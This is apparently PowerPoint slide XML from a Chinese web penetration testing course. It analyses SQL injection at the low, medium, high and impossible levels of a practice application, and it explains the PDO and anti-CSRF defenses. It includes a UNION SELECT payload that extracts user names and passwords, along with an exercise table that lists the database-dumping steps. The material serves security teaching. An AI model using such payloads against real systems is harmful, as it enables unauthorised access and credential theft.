            <a:endParaRPr sz="2400" b="1">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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）源代码分析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indent="0"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仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>①</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>igh级别只是在SQL查询语句中添加了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>LIMIT 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，手工注入过程与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l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ow级别一样，我们直接最后一步，注入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>union select user,password from users #</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L="0" lvl="1" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="10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sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2545200" y="2987040"/>
            <a:ext cx="7114540" cy="3554095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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00" y="1247775"/>
            <a:ext cx="10817860" cy="484759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b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 2</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析high级别的SQL注入源代码</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" algn="l"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sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）源代码分析</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1" algn="l" eaLnBrk="0" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:latin typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="仿宋" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    ②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h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>igh级别的查询提交页面与查询结果显示页面不是同一个，也没有执行302跳转，这样做的目的是为了防止一般的sqlmap注入，因为sqlmap在注入过程中，无法在查询提交页面上获取查询的结果，没有了反馈，也就没办法用Burp Suite进一步注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 70"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3374073" y="2147570"/>
            <a:ext cx="5273675" cy="4122420"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId6"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1247775"/>
            <a:ext cx="10817860" cy="871220"/>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b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mpossible级别的SQL注入源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（1）查看源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId7"/>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【任务描述】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="252730" y="56515"/>
            <a:ext cx="55791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en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>6</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>.1 Web渗透测试工具</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20" name="文本框 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="751840" y="1828165"/>
            <a:ext cx="10761980" cy="1782445"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marR="0" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" kern="100" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" kern="100" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>小王使用不同的漏洞扫描工具对目标Web系统进行漏洞扫描，根据扫描的报警信息，确认目标Web系统是否在漏洞。小王需要使用Burp Suite的Proxy功能来查看并修改拦截的信息。</a:t>
            </a:r>
            <a:endParaRPr sz="2400" kern="100" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marR="0" indent="266700" algn="just">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" kern="100" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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3"/>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4"/>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Tree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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3" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>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8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720090" y="1247775"/>
            <a:ext cx="10817860" cy="3472815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 3</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mpossible级别的SQL注入源代码</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" eaLnBrk="0" hangingPunct="0">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>）分析防御措施</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="609600" eaLnBrk="0" fontAlgn="auto" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="500"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="CC0000"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:extLst>
                <a:ext uri="{35155182-B16C-46BC-9424-99874614C6A1}">
                  <wpsdc:indentchars xmlns:wpsdc="http://www.wps.cn/officeDocument/2017/drawingmlCustomData" val="200" checksum="4158780845"/>
                </a:ext>
              </a:extLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mpossible级别的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入，同时只有返回的查询结果数量为一时，才会成功输出，这样就有效预防了“爆库”，Anti-CSRF token机制的加入了进一步提高了安全性。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" sz="2400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="375285"/>
            <a:ext cx="11473180" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="3555">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3110">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>任务实施二：分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3110">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3110">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3110">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>high</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3110">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3110">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="+mn-lt"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>impossible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3110">
                <a:latin typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:cs typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>级别的SQL注入源代码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" sz="3555">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3555">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>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167386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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成寻找SQL注入攻击点，并判断SQL注入攻击的类型。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>完成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ow、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>edium和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>igh这三个级别的“爆库”操作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="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lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="黑体" panose="02010609060101010101" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>填写以下项目训练节点的名称或参数</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="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【任务训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>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graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="表格 1"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1760538" y="3572510"/>
          <a:ext cx="8169275" cy="2582545"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1717040"/>
                <a:gridCol w="2637790"/>
                <a:gridCol w="3814445"/>
              </a:tblGrid>
              <a:tr h="28765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项目名称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项目节点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节点参数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8470">
                <a:tc row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SQL注入漏洞</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1、猜解SQL查询语句中的字段数</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91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2、获取当前数据库</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91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3、获取当前数据库中的表</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91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4、获取表中的字段名</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91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5、获取用户名和密码</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占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>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3756" y="1853381"/>
            <a:ext cx="4302496" cy="638783"/>
            <a:chOff x="6627851" y="1754191"/>
            <a:chExt cx="4302496" cy="638783"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>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5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>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学生自评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文本框 571"/>
